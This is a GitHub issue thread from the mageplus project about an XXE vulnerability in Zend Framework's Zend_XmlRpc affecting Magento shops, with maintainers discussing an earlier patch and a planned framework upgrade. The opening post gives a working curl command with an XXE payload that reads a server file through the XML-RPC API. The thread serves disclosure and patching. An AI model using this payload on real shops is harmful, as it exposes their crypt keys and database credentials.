### ISSUE TITLE
Critical Security Vulnerability in ZendFramework (upgrade Zend Framework to >= 1.11.12)

### ISSUE THREAD

**Issue by tux-rampage** [mageplus/mageplus#112]
There is a critical security issue in ZendFramework's Zend_XmlRpc allowing attackers to access any files from filesystem the webserver user has access to. So it is possible to read magento's etc/local.xml to find out the krypt_key or database params.

Zend Framework should be updated to Version 1.11.12 ASAP which solves this issue.
The following exploit works with every Magento that is using ZF < 1.11.12 (Also Mage+):

```
curl -k -d '<?xml version="1.0"?><!DOCTYPE foo [ <!ELEMENT methodName ANY ><!ENTITY xxe SYSTEM "file:///etc/aliases" >]><methodCall><methodName>&xxe;</methodName></methodCall>' http://MY-SHOP/api/xmlrpc
```

Source:
http://www.heise.de/newsticker/meldung/Magento-Shops-durch-Zend-Luecke-angreifbar-1666812.html
http://www.nakamilounge.de/blog/2012/08/zend-lucke-in-magento-offenbar-weitgehend-unbekannt-bei-shop-betreibern/

**Comment by leesbian** [comment]
Thanks 

Is this a different exploit to the previous XML-RPC exploit from a few weeks ago? (resolved in this commit https://github.com/mageplus/mageplus/commit/65e54d761585f7305076a1b8eb32aac753972bf7)

**Comment by tux-rampage** [comment]
Nope its the same exploit so this might be fixed, thanks for the hint. I just took a look at the Zend Framework version which is vulnerable. But updating ZendFramework would be a good idea anyways. Open a separate issue or change this one?

**Comment by leesbian** [comment]
Yeah - upgrading ZF is a better fix than the current fix which just overrides the 2 concerned files

i've changed the title of the issue to reflect an upgrade to ZF. Will get this in for the 1.1 release, it's too big a change for a bugfix release
